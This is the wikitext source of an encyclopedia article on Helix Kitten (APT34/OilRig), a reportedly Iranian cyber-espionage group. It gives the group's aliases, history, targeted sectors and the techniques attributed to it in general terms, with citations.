Login
Login

Helix Kitten

{{Short description|Iranian hacker group}}

{{Infobox Organization

| name = Helix Kitten

| native_name = بچه گربه هلیکس

| native_name_lang = Persian

| named_after =

| image =

| alt =

| formation = {{circa}} 2004–2007{{ref|a}}

| type = Advanced persistent threat

| purpose = Cyberespionage, cyberwarfare

| motto =

| headquarters =

| region =

| methods = Zero-days, spearphishing, malware

| membership =

| leader_name =

| language = Persian

| parent_organization =

| affiliations = APT33

| formerly = APT34

| website =

| remarks =

}}

Helix Kitten (also known as APT34 by FireEye, OILRIG, Crambus, Cobalt Gypsy, Hazel Sandstorm,{{cite web |title=How Microsoft names threat actors |url=https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming |publisher=Microsoft |access-date=21 January 2024}} or EUROPIUM){{cite web | url=https://thehackernews.com/2023/12/iranian-state-sponsored-oilrig-group.html?m=1 | title=Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders }} is a hacker group identified by CrowdStrike as Iranian.{{cite magazine |magazine=Wired |title=APT 34 Is an Iran-Linked Hacking Group That Probes Critical Infrastructure |url=https://www.wired.com/story/apt-34-iranian-hackers-critical-infrastructure-companies/ |archive-url=https://web.archive.org/web/20171210144943/https://www.wired.com/story/apt-34-iranian-hackers-critical-infrastructure-companies/ |archive-date=December 10, 2017 |first=Lily Hay |last=Newman |date=December 7, 2017}}{{cite news |url=https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html |publisher=FireEye |title=New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit |date=December 7, 2017 |archive-date=December 10, 2017 |archive-url=https://web.archive.org/web/20171210145601/https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html |first1=Manish |last1=Sardiwal |first2=Yogesh |last2=Londhe |first3=Nalani |last3=Fraser |first4=Nicholas |last4=Fraser |first5=Jaqueline |last5=O'Leary |first6=Vincent |last6=Cannon}}

History

The group has reportedly been active since at least 2014. It has targeted many of the same organizations as Advanced Persistent Threat 33, according to John Hultquist.

In April 2019, APT34's cyber-espionage tools' source code was leaked through Telegram.{{cite web|url=https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/ |title=Source code of Iranian cyber-espionage tools leaked on Telegram; APT34 hacking tools and victim data leaked on a secretive Telegram channel since last month. |author=Catalin Cimpanu |date=April 17, 2019 |website= ZDNet|publisher= |access-date=April 24, 2019}}{{cite web | url=https://www.cyberscoop.com/oilrig-leak-iran-telegram-helix-kitten/ | title=How companies – and the hackers themselves – could respond to the OilRig leak | date=18 April 2019 }}

Targets

The group has reportedly targeted organizations in the financial, energy, telecommunications, and chemical industries, as well as critical infrastructure systems.

Techniques

APT34 reportedly uses Microsoft Excel macros, PowerShell-based exploits and social engineering to gain access to its targets.

References

{{reflist}}

{{Hacking in the 2010s}}

Category:Iranian advanced persistent threat groups